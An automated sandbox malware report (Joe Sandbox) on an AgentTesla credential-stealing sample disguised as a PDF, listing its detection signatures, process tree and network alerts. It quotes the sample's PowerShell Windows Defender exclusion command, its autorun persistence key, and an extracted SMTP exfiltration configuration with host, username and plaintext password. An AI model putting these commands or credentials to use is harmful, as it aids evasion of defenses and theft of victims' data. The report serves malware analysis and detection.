Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
PO-2024)bekotas.pdf.exe

Overview

General Information

Sample name:PO-2024)bekotas.pdf.exe
Analysis ID:1466697
MD5:2226b8a2ac6e61dd5bc5327d48c74e1c
SHA1:7b7b425df447fb64abfbf7fe34d336b13d8d8bb0
SHA256:72629b026d1626923f7d3280d0dabb7c1a9ee869b7ce9ec2f02c949544c8326f
Tags:AgentTeslaexe
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Suspicious Double Extension File Execution
Snort IDS alert for network traffic
Yara detected AgentTesla
Yara detected AntiVM3
.NET source code contains potential unpacker
.NET source code contains very large array initializations
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Contains functionality to log keystrokes (.Net Source)
Contains functionality to register a low level keyboard hook
Hides that the sample has been downloaded from the Internet (zone.identifier)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Installs a global keyboard hook
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses an obfuscated file name to hide its real file extension (double extension)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Outbound SMTP Connections
Uses 32bit PE files
Uses SMTP (mail sending)
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • PO-2024)bekotas.pdf.exe (PID: 4440 cmdline: "C:\Users\user\Desktop\PO-2024)bekotas.pdf.exe" MD5: 2226B8A2AC6E61DD5BC5327D48C74E1C)
    • powershell.exe (PID: 3668 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO-2024)bekotas.pdf.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 6476 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • PO-2024)bekotas.pdf.exe (PID: 3452 cmdline: "C:\Users\user\Desktop\PO-2024)bekotas.pdf.exe" MD5: 2226B8A2AC6E61DD5BC5327D48C74E1C)
  • ctsdvwT.exe (PID: 4332 cmdline: "C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe" MD5: 2226B8A2AC6E61DD5BC5327D48C74E1C)
    • ctsdvwT.exe (PID: 760 cmdline: "C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe" MD5: 2226B8A2AC6E61DD5BC5327D48C74E1C)
    • ctsdvwT.exe (PID: 4612 cmdline: "C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe" MD5: 2226B8A2AC6E61DD5BC5327D48C74E1C)
  • ctsdvwT.exe (PID: 2472 cmdline: "C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe" MD5: 2226B8A2AC6E61DD5BC5327D48C74E1C)
    • ctsdvwT.exe (PID: 6360 cmdline: "C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe" MD5: 2226B8A2AC6E61DD5BC5327D48C74E1C)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.musabody.com", "Username": "victoria@musabody.com", "Password": "MUSAbody_victoria2018"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000006.00000002.2167208545.0000000004024000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    00000006.00000002.2167208545.0000000004024000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      0000000A.00000002.2255092408.00000000042A9000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        0000000A.00000002.2255092408.00000000042A9000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          00000006.00000002.2167208545.0000000003FA9000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            Click to see the 22 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            6.2.ctsdvwT.exe.3fa9990.2.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              6.2.ctsdvwT.exe.3fa9990.2.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                10.2.ctsdvwT.exe.4344c70.2.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                  10.2.ctsdvwT.exe.4344c70.2.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                    6.2.ctsdvwT.exe.3fa9990.2.unpackINDICATOR_SUSPICIOUS_EXE_VaultSchemaGUIDDetects executables referencing Windows vault credential objects. Observed in infostealersditekSHen
                    • 0x318c8:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
                    • 0x3193a:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
                    • 0x319c4:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
                    • 0x31a56:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
                    • 0x31ac0:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
                    • 0x31b32:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
                    • 0x31bc8:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
                    • 0x31c58:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
                    Click to see the 34 entries

                    Sigma Signatures

                    System Summary

                    barindex
                    Sigma detected: Suspicious Double Extension File Execution
                    Source: Process startedAuthor: Florian Roth (Nextron Systems), @blu3_team (idea), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Users\user\Desktop\PO-2024)bekotas.pdf.exe", CommandLine: "C:\Users\user\Desktop\PO-2024)bekotas.pdf.exe", CommandLine|base64offset|contains: , Image: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exe, NewProcessName: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exe, OriginalFileName: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Users\user\Desktop\PO-2024)bekotas.pdf.exe", ProcessId: 4440, ProcessName: PO-2024)bekotas.pdf.exe
                    Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO-2024)bekotas.pdf.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO-2024)bekotas.pdf.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\PO-2024)bekotas.pdf.exe", ParentImage: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exe, ParentProcessId: 4440, ParentProcessName: PO-2024)bekotas.pdf.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO-2024)bekotas.pdf.exe", ProcessId: 3668, ProcessName: powershell.exe
                    Sigma detected: CurrentVersion Autorun Keys Modification
                    Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exe, ProcessId: 3452, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ctsdvwT
                    Sigma detected: Powershell Defender Exclusion
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO-2024)bekotas.pdf.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO-2024)bekotas.pdf.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\PO-2024)bekotas.pdf.exe", ParentImage: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exe, ParentProcessId: 4440, ParentProcessName: PO-2024)bekotas.pdf.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO-2024)bekotas.pdf.exe", ProcessId: 3668, ProcessName: powershell.exe
                    Sigma detected: Suspicious Outbound SMTP Connections
                    Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 108.167.140.123, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exe, Initiated: true, ProcessId: 3452, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 64941
                    Sigma detected: Non Interactive PowerShell Process Spawned
                    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO-2024)bekotas.pdf.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO-2024)bekotas.pdf.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\PO-2024)bekotas.pdf.exe", ParentImage: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exe, ParentProcessId: 4440, ParentProcessName: PO-2024)bekotas.pdf.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO-2024)bekotas.pdf.exe", ProcessId: 3668, ProcessName: powershell.exe

                    Snort Signatures

                    Timestamp:07/03/24-09:49:42.787550
                    SID:2855542
                    Source Port:64941
                    Destination Port:587
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:07/03/24-09:49:42.787550
                    SID:2851779
                    Source Port:64941
                    Destination Port:587
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:07/03/24-09:49:42.787550
                    SID:2840032
                    Source Port:64941
                    Destination Port:587
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:07/03/24-09:49:42.787473
                    SID:2839723
                    Source Port:64941
                    Destination Port:587
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:07/03/24-09:49:42.787473
                    SID:2030171
                    Source Port:64941
                    Destination Port:587
                    Protocol:TCP
                    Classtype:A Network Trojan was detected

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Found malware configuration
                    Source: 0.2.PO-2024)bekotas.pdf.exe.3b546c0.3.raw.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.musabody.com", "Username": "victoria@musabody.com", "Password": "MUSAbody_victoria2018"}
                    Multi AV Scanner detection for dropped file
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeReversingLabs: Detection: 23%
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeVirustotal: Detection: 32%Perma Link
                    Multi AV Scanner detection for submitted file
                    Source: PO-2024)bekotas.pdf.exeReversingLabs: Detection: 23%
                    Source: PO-2024)bekotas.pdf.exeVirustotal: Detection: 32%Perma Link
                    AI detected suspicious sample
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                    Machine Learning detection for dropped file
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeJoe Sandbox ML: detected
                    Machine Learning detection for sample
                    Source: PO-2024)bekotas.pdf.exeJoe Sandbox ML: detected
                    Source: PO-2024)bekotas.pdf.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: PO-2024)bekotas.pdf.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: Binary string: umXx.pdbSHA256I/ source: PO-2024)bekotas.pdf.exe, ctsdvwT.exe.5.dr
                    Source: Binary string: umXx.pdb source: PO-2024)bekotas.pdf.exe, ctsdvwT.exe.5.dr
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeCode function: 4x nop then jmp 04AF4F5Ch0_2_04AF46FB
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 4x nop then jmp 02D44BECh6_2_02D4438B
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 4x nop then jmp 01834BECh10_2_0183438B

                    Networking

                    barindex
                    Snort IDS alert for network traffic
                    Source: TrafficSnort IDS: 2855542 ETPRO TROJAN Agent Tesla CnC Exfil Activity 192.168.2.5:64941 -> 108.167.140.123:587
                    Source: TrafficSnort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.5:64941 -> 108.167.140.123:587
                    Source: TrafficSnort IDS: 2840032 ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 192.168.2.5:64941 -> 108.167.140.123:587
                    Source: TrafficSnort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.5:64941 -> 108.167.140.123:587
                    Source: TrafficSnort IDS: 2839723 ETPRO TROJAN Win32/Agent Tesla SMTP Activity 192.168.2.5:64941 -> 108.167.140.123:587
                    Source: global trafficTCP traffic: 192.168.2.5:64941 -> 108.167.140.123:587
                    Source: Joe Sandbox ViewIP Address: 108.167.140.123 108.167.140.123
                    Source: Joe Sandbox ViewASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US
                    Source: global trafficTCP traffic: 192.168.2.5:64941 -> 108.167.140.123:587
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: global trafficDNS traffic detected: DNS query: mail.musabody.com
                    Source: PO-2024)bekotas.pdf.exe, 00000005.00000002.4459041571.0000000002B19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mail.musabody.com
                    Source: PO-2024)bekotas.pdf.exe, 00000000.00000002.2014482605.0000000002C54000.00000004.00000800.00020000.00000000.sdmp, ctsdvwT.exe, 00000006.00000002.2165652730.000000000312D000.00000004.00000800.00020000.00000000.sdmp, ctsdvwT.exe, 0000000A.00000002.2250775704.0000000003447000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: PO-2024)bekotas.pdf.exe, 00000000.00000002.2014871271.0000000003B19000.00000004.00000800.00020000.00000000.sdmp, ctsdvwT.exe, 00000006.00000002.2167208545.0000000004024000.00000004.00000800.00020000.00000000.sdmp, ctsdvwT.exe, 00000006.00000002.2167208545.0000000003FA9000.00000004.00000800.00020000.00000000.sdmp, ctsdvwT.exe, 00000008.00000002.2228074088.0000000000402000.00000040.00000400.00020000.00000000.sdmp, ctsdvwT.exe, 0000000A.00000002.2255092408.00000000042A9000.00000004.00000800.00020000.00000000.sdmp, ctsdvwT.exe, 0000000A.00000002.2255092408.0000000004344000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://account.dyn.com/

                    Key, Mouse, Clipboard, Microphone and Screen Capturing

                    barindex
                    Contains functionality to log keystrokes (.Net Source)
                    Source: 0.2.PO-2024)bekotas.pdf.exe.3b546c0.3.raw.unpack, POq2Ux.cs.Net Code: _4H57oeN1J
                    Source: 0.2.PO-2024)bekotas.pdf.exe.3b19aa0.5.raw.unpack, POq2Ux.cs.Net Code: _4H57oeN1J
                    Contains functionality to register a low level keyboard hook
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 11_2_0613EE20 SetWindowsHookExA 0000000D,00000000,?,?,?,?,?,?,?,?,?,0613FC90,00000000,0000000011_2_0613EE20
                    Installs a global keyboard hook
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeWindows user hook set: 0 keyboard low level C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeWindows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeWindows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior

                    System Summary

                    barindex
                    Malicious sample detected (through community Yara rule)
                    Source: 6.2.ctsdvwT.exe.3fa9990.2.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 10.2.ctsdvwT.exe.4344c70.2.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 10.2.ctsdvwT.exe.42a9970.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 6.2.ctsdvwT.exe.4024710.5.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 8.2.ctsdvwT.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 10.2.ctsdvwT.exe.42a9970.3.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 6.2.ctsdvwT.exe.4024710.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 0.2.PO-2024)bekotas.pdf.exe.3b546c0.3.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 0.2.PO-2024)bekotas.pdf.exe.3b19aa0.5.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 6.2.ctsdvwT.exe.3fa9990.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 10.2.ctsdvwT.exe.4344c70.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 0.2.PO-2024)bekotas.pdf.exe.3b546c0.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 0.2.PO-2024)bekotas.pdf.exe.3b19aa0.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    .NET source code contains very large array initializations
                    Source: 0.2.PO-2024)bekotas.pdf.exe.5440000.6.raw.unpack, -Module-.csLarge array initialization: _200D_200D_202B_206F_206A_206B_202B_200B_200D_206D_200C_206B_206A_200B_202E_200C_200E_202A_200E_206D_206F_202D_206F_206D_206C_200F_206A_202D_206C_202B_206A_206F_202A_206A_200E_200F_200B_200F_202E_202D_202E: array initializer size 3088
                    Source: 0.2.PO-2024)bekotas.pdf.exe.2adc2f4.0.raw.unpack, -Module-.csLarge array initialization: _200D_200D_202B_206F_206A_206B_202B_200B_200D_206D_200C_206B_206A_200B_202E_200C_200E_202A_200E_206D_206F_202D_206F_206D_206C_200F_206A_202D_206C_202B_206A_206F_202A_206A_200E_200F_200B_200F_202E_202D_202E: array initializer size 3088
                    Initial sample is a PE file and has a suspicious name
                    Source: initial sampleStatic PE information: Filename: PO-2024)bekotas.pdf.exe
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeCode function: 0_2_011BD3640_2_011BD364
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeCode function: 0_2_04AF0D900_2_04AF0D90
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeCode function: 0_2_04AF77D80_2_04AF77D8
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeCode function: 0_2_04AF67380_2_04AF6738
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeCode function: 0_2_04AF17400_2_04AF1740
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeCode function: 0_2_04AF43EB0_2_04AF43EB
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeCode function: 0_2_050B7D580_2_050B7D58
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeCode function: 0_2_050B00060_2_050B0006
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeCode function: 0_2_050B00400_2_050B0040
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeCode function: 0_2_050BAEB00_2_050BAEB0
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeCode function: 0_2_050FF7180_2_050FF718
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeCode function: 0_2_050FBB700_2_050FBB70
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeCode function: 0_2_050FFBF40_2_050FFBF4
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeCode function: 0_2_050FF6FF0_2_050FF6FF
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeCode function: 0_2_050FBB600_2_050FBB60
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeCode function: 5_2_00FE97585_2_00FE9758
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeCode function: 5_2_00FEC9D85_2_00FEC9D8
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeCode function: 5_2_00FE4AA85_2_00FE4AA8
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeCode function: 5_2_00FE3E905_2_00FE3E90
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeCode function: 5_2_00FE41D85_2_00FE41D8
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeCode function: 5_2_050E15F05_2_050E15F0
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeCode function: 5_2_050E2D985_2_050E2D98
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeCode function: 5_2_050E08485_2_050E0848
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeCode function: 5_2_050E26B05_2_050E26B0
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeCode function: 5_2_050E7FA85_2_050E7FA8
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeCode function: 5_2_050E7FA35_2_050E7FA3
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 6_2_02D417406_2_02D41740
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 6_2_02D464906_2_02D46490
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 6_2_02D40D906_2_02D40D90
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 6_2_02D475306_2_02D47530
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 6_2_02E0D3646_2_02E0D364
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 6_2_074887886_2_07488788
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 6_2_0748C2286_2_0748C228
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 6_2_074810606_2_07481060
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 6_2_07487F286_2_07487F28
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 6_2_07483D506_2_07483D50
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 6_2_0748877B6_2_0748877B
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 6_2_0748F5786_2_0748F578
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 6_2_074824506_2_07482450
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 6_2_074824606_2_07482460
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 6_2_0748F1406_2_0748F140
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 6_2_07487F186_2_07487F18
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 6_2_07480F896_2_07480F89
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 6_2_07483EE36_2_07483EE3
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 6_2_07483CC86_2_07483CC8
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 6_2_07481A986_2_07481A98
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 6_2_074879676_2_07487967
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 6_2_074879786_2_07487978
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 6_2_074819186_2_07481918
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 6_2_074819126_2_07481912
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 8_2_011B96388_2_011B9638
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 8_2_011BC9808_2_011BC980
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 8_2_011B4AA88_2_011B4AA8
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 8_2_011B3E908_2_011B3E90
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 8_2_011B41D88_2_011B41D8
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 8_2_011BCC688_2_011BCC68
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 10_2_014DD36410_2_014DD364
